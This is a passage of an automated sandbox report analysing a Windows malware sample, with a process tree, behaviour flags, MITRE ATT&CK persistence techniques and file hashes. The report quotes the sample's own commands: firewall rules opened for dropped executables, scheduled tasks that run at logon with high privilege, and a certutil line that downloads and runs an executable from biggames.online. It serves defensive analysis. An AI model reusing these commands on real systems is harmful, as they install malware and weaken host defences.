a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe 94 PID 3448 wrote to memory of 5020 3448 cmd.exe 96 PID 3448 wrote to memory of 5020 3448 cmd.exe 96 PID 4628 wrote to memory of 1860 4628 a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe 97 PID 4628 wrote to memory of 1860 4628 a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe 97 PID 4628 wrote to memory of 1860 4628 a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe 97 PID 1860 wrote to memory of 4784 1860 csrss.exe 98 PID 1860 wrote to memory of 4784 1860 csrss.exe 98 PID 1860 wrote to memory of 4784 1860 csrss.exe 98 PID 1860 wrote to memory of 4784 1860 csrss.exe 98 PID 1860 wrote to memory of 4784 1860 csrss.exe 98 PID 1860 wrote to memory of 4784 1860 csrss.exe 98 PID 1860 wrote to memory of 4784 1860 csrss.exe 98 PID 1860 wrote to memory of 4784 1860 csrss.exe 98 PID 1860 wrote to memory of 4784 1860 csrss.exe 98 PID 1860 wrote to memory of 4784 1860 csrss.exe 98 PID 4784 wrote to memory of 3040 4784 csrss.exe 104 PID 4784 wrote to memory of 3040 4784 csrss.exe 104 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4520 -
C:\Users\Admin\AppData\Local\Temp\a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1384 -
C:\Users\Admin\AppData\Local\Temp\a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe"3⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1196 -
C:\Users\Admin\AppData\Local\Temp\a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe"4⤵
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4628 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵
- Suspicious use of WriteProcessMemory
PID:4800 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:2496
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f956a05b2009\f956a05b2009\f956a05b2009.exe" enable=yes"5⤵
- Suspicious use of WriteProcessMemory
PID:3448 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f956a05b2009\f956a05b2009\f956a05b2009.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:5020
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""6⤵
- Executes dropped EXE
- Manipulates WinMonFS driver.
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4784 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
PID:3592
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://biggames.online/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F7⤵
- Creates scheduled task(s)
PID:2656
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"7⤵
- Executes dropped EXE
PID:1216
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v7⤵
- Modifies boot configuration data using bcdedit
PID:3040
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD513aaafe14eb60d6a718230e82c671d57
SHA1e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3
-
Filesize
3.9MB
MD5a6e6a5298c97037f5f84d5137ce67f50
SHA1cbe82b83c5970186d6d3d3fb898bbe3988c96c99
SHA256debbe172912022917f4dd474601c5c482861035e78f9effb590e15310f609c6b
SHA51202bb695f2de853223762c26465cb9963671bcf7ef06145ad5da0809de44f61906282965adbcafd85dfb83cb38712c35bf218f0e042ebf91ff8cf24d4f26799b6